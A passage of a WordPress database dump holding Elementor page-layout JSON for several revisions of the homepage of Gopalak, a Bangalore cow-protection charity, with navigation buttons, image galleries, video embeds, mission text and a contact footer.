here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9707,1634,'_elementor_page_assets','a:0:{}'),(9709,1635,'_elementor_edit_mode','builder'),(9710,1635,'_elementor_template_type','wp-page'),(9711,1635,'_elementor_version','3.7.8'),(9712,1635,'_wp_page_template','elementor_canvas'),(9713,1635,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"taiowc-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9714,1635,'_elementor_page_assets','a:0:{}'),(9715,1636,'_elementor_edit_mode','builder'),(9716,1636,'_elementor_template_type','wp-page'),(9717,1636,'_elementor_version','3.7.8'),(9718,1636,'_wp_page_template','elementor_canvas'),(9719,1636,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"taiowc-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},